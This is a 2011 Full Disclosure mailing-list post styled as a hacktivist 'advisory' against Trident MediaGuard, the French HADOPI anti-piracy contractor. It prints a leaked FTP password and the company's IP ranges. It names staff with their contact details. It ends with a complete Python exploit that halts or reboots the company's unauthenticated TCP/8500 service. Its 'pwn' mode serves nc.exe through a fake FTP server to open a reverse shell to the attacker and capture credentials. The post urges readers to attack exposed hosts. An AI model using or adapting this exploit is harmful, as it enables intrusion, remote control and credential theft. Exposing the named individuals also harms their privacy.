Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Too Many Gremlins for Trident MediaGuard (HADOPI)
From: "cult.of.the.dead.hadopi.tmg cult.of.the.dead.hadopi.tmg" <cult.of.the.dead.hadopi.tmg () gmail com>
Date: Fri, 20 May 2011 20:59:38 +0200

-- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET --


                 --==[ CULT OF THE DEAD HADOPI ]==--
                            Advisory 2


The HADOPI law or Creation and Internet law (French: Loi favorisant la
   diffusion et la protection de la création sur Internet, "law
  promoting the distribution and protection of creative works on the
   internet") is a French law introduced during 2009, attempting to
     control and regulate internet access as a means to encourage
  compliance with copyright laws. "HADOPI" is the government agency
                    created by the eponymous law.

              http://en.wikipedia.org/wiki/HADOPI_law


In  a previous  advisory, we  exposed the  secret plan  of  the French
government to take  over the Internet using a  patriotic botnet. A few
days after the strategy was exposed, the piece of software was removed
by Orange. No more Internet by Orange...

Now, the cult of the dead HADOPI is proud to announce his new advisory
(free copy, quote it as much as you want, no tax to be paid):

                          Too Many Gremlins
                                 for
                          Trident MediaGuard


After such  a big failure at  creating a patriotic  botnet, the French
government  is trying to  build a  new army  with strong  and reliable
soldiers: Gremlins.

They subcontracted  with a private company  called Trident MediaGuard.
This  company is  as  concealed as  Bin  Laden in  the  middle of  the
Pakistan.  It is the long arm  of the HADOPI and the French government
for  everything related  to 3  strikes  laws. Note  that they  recruit
people all over Europe at least. Fear the Gremlins.

But they fucked everything up as DSK.


Who are they?

Trident Media Guard (TMG) is a French company specialized in software
to prevent unauthorized copying of files over the Internet. Founded in
     2002 by Alain Guislain and Bastien Casalta, it is located in
                Saint-Sébastien-sur-Loire near Nantes.

  It aims to "provide services to major publishing companies of the
recording and film industry to stop the loss of revenue due to illegal
                 downloads on peer-to-peer networks."

           http://en.wikipedia.org/wiki/Trident_Media_Guard
 http://www.societe.com/societe/trident-media-guar-sa-441392586.html


You have to read to the end to learn how to pwn the Gremlins!



Never expose the Mogwai to bright lights *****************

During a  few days around the  14th-15th of may 2011,  a "test server"
(according to Too Many Gremlins spokeman) was exposed on the Internet.
It was supposed to be used for R&D only.

This server  (91.189.104.82) gave some  files revealing what  Too Many
Gremlins is filtering, and how they are working.

You can retrieve all the files here: http://pastebin.com/Rc1zGXu0

They should remember it is better  to close the door before going into
the bathroom. You never know, a maid could come in.


Never trust 91.189.104.0 - 91.189.111.255 -------------------------------


When you look for information about 91.189.104.82, you discover it belongs to:

$ whois 91.189.104.82
Inetnum:        91.189.104.0 - 91.189.111.255
netname:        FARM04
descr:          Trident Mediguard
country:        FR
org:            ORG-TA253-RIPE
admin-c:        CB1756-RIPE
tech-c:         CB1756-RIPE

person:       Casalta Bastien
address:      Trident Mediguard
              13 rue de la Tour d'Auvergne
              44200 Nantes
              FR
phone:        +33 2 40 12 00 97
fax-no:       +33 2 40 35 36 79
e-mail:       casalta () mediaguard info
nic-hdl:      CB1756-RIPE

route:          91.189.104.0/21
descr:          Trident Mediguard
origin:         AS174
mnt-by:         COGENT-ROUTE-MNT


Gremlins, especially French ones, are horny and tend to reproduce very
quickly. They need at least a /21!

So, if  you don't want gremlins to  get you, just ban  these IPs.  Hmmm
maybe they noticed people already do that. So maybe now they are using
the same  tricks every one does to  bypass the 3 strikes  law: using a
VPN

On a side note, quite  funny:
$  host  mediaguard.info
mediaguard.info  has  address 212.53.95.124
mediaguard.info mail is handled by 10 smtp99.nagra.com.

WTF is mediaguard doing with Nagra!


Back to the future  -------------------------------

Gremlins  can look so  nice, so  sweat, so  kind especially  when they
promise  to  government:  Sir,  yes  Sir, all  privacy  will  be  kept
secret. We care about privacy, security,  we really do, as long as you
pay us.

But of  course, leaks happen, like  in 2007 with  Media Defender (just
google for "mediadefender email leak")

Then,  you  could  find  emails  from Bastien  Casalta,  asking  Media
Defender not to block some IP ranges:

  From: Bastien Casalta
  To: Ben Grodsky
  Sent: Thu Aug 30 01:01:56 2007
  Subject: IP Blocks

  Hello Ben,

  - you can ignore the following ip blocks:
    82.138.81.0 /24
    82.138.88.0 /22
    91.189.104.0 /21
    130.117.41.0 /24
    130.117.115.128 /25

  Best,

    Bastien

  TMG
  13, rue de la Loire - Bât D
  44230 St Sébastien Sur Loire
  Tel 02 40 12 00 97
  Fax 02 40 35 36 79
  contact_at_tmg.eu



It  seems the  range  where the  leak  of the  so  called test  server
91.189.104.82 happens  already belong to  the Gremlins in  2007. Maybe
you also want to ban these ranges too.

BTW, you want to get in  touch with Bastien Casalta, use the proper
email: casalta(at)tmg.eu


Gimme money ------------------------------

French politics can be very perv  (yes, DSK is not the only one). They
succeed  in  taking  taxes  from  people and  give  it  to  innovative
company. In 2005,  Too Many Gremlins get 40.000  Euro from an official
agency supposed to help "innovative companies".

You see, all French are perverse: they pay taxes to get big brothered.

http://www.reseau-entreprendre-atlantique.fr/reseau-entreprendre-atlantique/fr/s04_laureats/s04p03_fiche_laureat.php?laureat=1897


Patents ------------------------------

The gremlins are  very possessive. As such, they  try to protect their
"precious". And  nowadays, you  don't have to  hide for centuries  in a
cave: you patent your idea!


* http://www.faqs.org/patents/app/20090210492

  Patent application title: METHOD FOR COMBATTING THE ILLICIT
  DISTRIBUTION OF PROTECTED MATERIAL AND COMPUTER SYSTEM FOR CARRYING
  OUT SAID METHOD

  Inventors: Alain Guislain (St. Sebastien Sur Loire, FR) Bastien
    Casalta (Nantes, FR) Soufiane Rouibia (Nantes, FR)
  IPC8 Class: AG06F1516FI
  USPC Class: 709204
  Publication date: 08/20/2009
  Patent application number: 20090210492

  Abstract:

    The invention relates to a  method for hindering or preventing the
    illegal distribution  of protected data in  a peer-to-peer network
    comprising  at  least one  peer  operating  an exchange  programme
    designed for distribution of data to at least one client according
    to a selective exchange protocol  permitting the peer to operate a
    selection  of  clients to  which  the  data  is transferred,  said
    selection  being  carried  out  as  a  function  of  one  or  more
    characteristics of the clients. In  said method bogus data is sent
    to the peer  such as to influence the  selection of clients served
    by the peer, such that the  peer is made to favour the transfer to
    authorised clients.


* http://www.faqs.org/patents/app/20100036935

  Patent application title: METHOD FOR REACTING TO THE BROADCAST OF A
  FILE IN A P2P NETWORK

  Inventors:  Bastien Casalta (Nantes, FR)  Soufiane Rouibia (Nantes, FR)
  IPC8 Class: AG06F1516FI
  USPC Class: 709219
  Publication date: 02/11/2010
  Patent application number: 20100036935

  Abstract:

    A method for establishing connections  with a number of peers of a
    peer  to  peer  network  operating  using at  least  one  exchange
    protocol, such  as to influence the  broadcast of a  file within a
    peer to peer  network, the addresses of the  number of peers being
    held by at  least one network server. A  connection is established
    with the network server such as to at least partially download the
    addresses  of the  number of  peers connected  to the  network and
    implicated in  the downloading of  the file, to a  control server,
    then  connections are  established  between at  least one  control
    client  exchanging data  with  the control  server  and peers  the
    addresses  of which have  been downloaded  to the  control server,
    such as to download content from  a peer to a controlled client or
    broadcast  content  from  a  controlled  client  to  a  peer,  the
    downloading  or broadcasting  being carried  out according  to the
    exchange protocol.



How to contact them -----------------------------

If you want to get in touch with the Gremlins leaders:
  * Alain Guislain, CEO
    http://fr.linkedin.com/pub/alain-guislain/1/215/952
  * Bastien Casalta, CTO
    http://www.linkedin.com/profile/view?id=4004355
  * Soufiane Rouibia, R&D manager
    http://fr.linkedin.com/pub/soufiane-rouibia/5/684/5b8

Or visit the empty website: http://tmg.eu




Never get it wet *****************

Ok, ok, it was a bit long. But you have to learn what Gremlins are to
understand this evil power. Let us have a look now at what was on that
server.


A list of names --------------------------------

In the server_interface.exe, the  Gremlins are spreading. You can find
a list of ... we don't know what yet. You can easily find it everywhere
on  the  Internet  now.  Just  look for  KingElvis,  jay () yahoo se  and
melon_foli, you will find the list.

Here, we are very disappointed: we can not determine what is this list
for :(

Are these the names of the Gremlins? Or nicks of the humans they ate?
No way to know.


Save your FTP password on the server itself ------------------------

No need to comment here...

91.189.104.82/test/script>> cat cmd_auto_update_cmd_file.txt
share
hFd38+1E
prompt
pasv
mget "script/script_diff2/execute_update.bat"
mget "script/script_diff2/cmd_execute_update_cmd_file.txt"


Oh yes!

Just   in  case   they  erase   the  above   file,  it   is   also  in
cmd_update_cmd_file.txt.

Remember, the Gremlins are supposed to protect your private data.



Never feed it after midnight *****************

Too Many Gremlins is an  innovative company. Let us see how innovative
is the way  the develop, and as such the way  they protect the private
data they gather.

Among files they shared, one  is called server_interface.exe.  It is a
Delphi service (welcome in the 90s) listening on TCP/8500.


Advanced features: authentication  -----------------------------

As  they keep  stating,  Too Many  Gremlins  are on  the  edge of  the
technology. The patents show how true  it is. Sadly, we could not find
their patent  on authentication ... maybe  because you do  not need to
authenticate!

Anyone can connect to this server and send commands. :)

This is called sharing, isn't-it ?


Advanced feature: protocol design ----------------------------

The protocol is very simple:


  - first four bytes must be \x15\x66\x00\x78
  - the next byte determines the command:
    - \x65: shutdown the computer
    - \x66: reboot the computer
    - \x70: execute stop_P2P_client.bat
            - two next bytes are used as size to get the output of this script
    - \x71: execute start_P2P_client.bat
            - two next bytes are used as size to get the output of this script
    - \x81: execute transfer_set.bat
            - next double word is the IP address to download files using FTP
            - next word is the port to use
            - two next bytes are used as size to get the output of this script
    - \x82: execute auto_update.bat
            - next double word is the IP address to download files using FTP
            - next word is the port to use
            - two next bytes are used as size to get the output of this script

As an  exercise, you can code  the proper Scapy  classes. Please, drop
your submissions to http://trac.secdev.org/scapy

Advanced features: pwn the Gremlins --------------------------

Let us have a look at auto_update.bat used by command \x82:

91.189.104.82/test/script>> cat auto_update.bat
@echo off

echo auto_update.bat
echo Transfering files from %1:%2, exiting in 10 sec

if (%1 == "") exit

echo Update cmd file
ftp -s:"C:\script\cmd_auto_update_cmd_file.txt" %1

execute_update.bat %1 %2

echo auto_update.bat completed

I think  you have spot  the problem :)  An attacker can use  the "Auto
Update" feature (\x82) to force the server to download updates from an
evil FTP server he controls.  Of course, a downloaded file is executed
just after the download...

Hence, anyone  who wants to raise  an army against  Too Many Gremlins,
look for open bar  on TCP 8500. Here is the gift  to you from the cult
of the dead HADOPI.

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
$> cat Too_Many_Greemlins_exposed_to_the_sunlight.py

#!/usr/bin/env python2
# -*- coding: utf-8 -*-

import sys
import struct
import time
import socket
from threading import Thread

#
# Change this IP to your public IP address.
#
PUBLIC_IP = "192.168.0.1"

#
# Don't forget to open ports 21 and 8501 in your
# OpenOffice.org firewall
#
SRV_PORT   = 8500
FTP_PORT   = 21
SHELL_PORT = 8501

MAGIC  = "\x15\x66\x00\x78"
HALT   = "\x65"
REBOOT = "\x66"
STOP   = "\x70\x00\x00"
UPDATE = "\x82"
OK     = "\x01"

def usage (msg = None):

  if msg: print "Error: %s\n" % msg

  print "Usage: %s IP command" % sys.argv[0]
  print
  print "commands:"
  print "- halt    shutdown the server"
  print "- reboot  reboot the server"
  print "- stop    stop P2P clients (eMule and Shareaza)"
  print "- pwn     use a vulnerability in the Auto Update feature to
get a remote shell"

  sys.exit(0)

class fake_ftpd(Thread):

    def __init__ (self):
      Thread.__init__(self)
      self.s = None
      f  = open('./nc.exe', 'rb')
      nc = f.read()
      f.close()
      batch  = "@echo off\r\n"
      batch += "move cmd_execute_update_cmd_file.txt nc.exe\r\n"
      batch += "nc.exe %s %s -e cmd.exe\r\n" % (PUBLIC_IP, SHELL_PORT)
      self.files = {
        'script/script_diff2/execute_update.bat': batch,
        'script/script_diff2/cmd_execute_update_cmd_file.txt': nc
      }

    def run (self):
      self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
      self.s.bind(("", FTP_PORT))
      self.s.listen(1)
      self.s.listen(0x1337)
      print "[+] Waiting for FTP connection..."

      conn, addr = self.s.accept()

      print "[!] FTP - %s connected!" % addr[0]
      conn.send("220 Welcome to my FTPd - Ready to pwn you!\r\n")

      while True:
        data = conn.recv(1024)
        if not data:
          break

        args = data.rstrip().split(' ')

        if data.startswith('CWD'):
          conn.send('250 CWD command successful.\r\n')

        elif data.startswith('TYPE'):
          conn.send('200 TYPE set.\r\n')

        elif data.startswith('USER'):
          conn.send('331 Password required.\r\n')
          username = data.split(' ')[1].rstrip()

        elif data.startswith('PASS'):
          conn.send('230 User logged in.\r\n')
          password = data.split(' ')[1].rstrip()
          print "[!] TMG credentials: %s/%s" % (username, password)

        elif data.startswith('PORT'):
          arg  = args[1].split(',')
          ip   = '.'.join(arg[:4])
          port = int(arg[4]) * 256 + int(arg[5])
          sdata = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          sdata.connect((ip, port))
          conn.send('200 PORT command successful.\r\n')

        elif data.startswith('RETR'):
          conn.send('150 Opening BINARY mode data connection\r\n')
          buf = self.files.get(args[1], 'file not found\r\n')
          sdata.send(buf)
          sdata.close()
          conn.send('226 Transfer complete\r\n')
          print "[+] File \"%s\" transfered..." % args[1]

        elif data.startswith('NLST'):
          conn.send('150 Here comes the directory listing.\r\n')
          if len(args) == 1:
            listing = ''
          else:
            listing = args[1]
          sdata.send(listing + '\r\n')
          sdata.close()
          conn.send('226 Directory send OK.\r\n')

        elif data.startswith('QUIT'):
          conn.send('221 Goodbye.\r\n')
          break

        else:
          conn.send('500 Unknown command.\r\n')

      conn.close()


def do_stuff (host, cmd):

  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.settimeout(5)

  try:
    print "[+] Connecting to %s:%d..." % (host, SRV_PORT)
    s.connect((host, SRV_PORT))

  except Exception, e:
    print("[?] Error: %s" % e)
    s.close()
    return ;

  print "[+] Sending evil packet..."

  if cmd == 'halt':
    s.send(MAGIC + HALT)
    print "[!] Done!"

  elif cmd == 'reboot':
    s.send(MAGIC + REBOOT)
    print "[!] Done!"

  elif cmd == 'stop':
    s.send(MAGIC + STOP)
    data = s.recv(1)

    if data and data[0] == OK:
      print "[!] Done!"
    else:
      print "[!] Error :("

  elif cmd == 'pwn':
    ftpd = fake_ftpd()
    ftpd.daemon = True
    ftpd.start()

    command = socket.inet_aton(PUBLIC_IP) + struct.pack("h",
socket.ntohs(FTP_PORT)) + "\x00\x00"
    s.send(MAGIC + UPDATE + command)
    data = s.recv(1)

    if data and data[0] == OK:
      s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
      s2.bind(("", SHELL_PORT))
      s2.listen(1)

      conn, addr = s2.accept()
      print "[!] SHELL - %s connected!" % addr[0]
      print conn.recv(4096)

      while True:
        cmd = raw_input()
        if cmd == "quit" or cmd == "exit":
            break;
        conn.send(cmd + "\r\n")

        data = ""
        conn.settimeout(None)
        data = conn.recv(1024)
        conn.settimeout(1)

        while True:
            line = ""
            try:
                line = conn.recv(1024)
            except socket.timeout:
                break
            if line == "":
                break
            data += line

        tab = data.split("\n")
        print "\n".join(tab[1:-1])

      conn.close()
    else:
      print "[!] Error :("

  s.close()

if __name__ == '__main__':

  if len(sys.argv) < 3:
    usage("Not enough arguments")

  (_, host, cmd) = sys.argv

  if cmd not in ['halt', 'reboot', 'stop', 'pwn']:
    usage('Invalid command ("%s")' % cmd)

  do_stuff(host, cmd)

  sys.exit(0)





Famous last words *****************

Whether or not this was test server, it does not matter.  It just show
how reliable Too Many Gremlins can be.

The piece  of software  is as  good as Orange's  one described  in our
previous advisory. Even a kid could pwn them. Scary.

French evil master plan agency HADOPI stated they are going to inspect
Too Many  Gremlins in order to assess  if they are secure  now. I hope
they also had  a look to their codes.  Oh no!   They can not.  Reverse
engineering is mostly  illegal in France. So we  should just trust the
Gremlins.



Greets ******

N. Sarkozy, Chinese fellows,  C. Albanel, F. Mitterrand J-L. Warsmann,
F.  Riester, F.  Lefebvre,  J-L.  Masson,  J.  Myard,  M.  Thiollière,
M. Marland-Militello


-- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Too Many Gremlins for Trident MediaGuard (HADOPI) cult.of.the.dead.hadopi.tmg cult.of.the.dead.hadopi.tmg (May 20)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault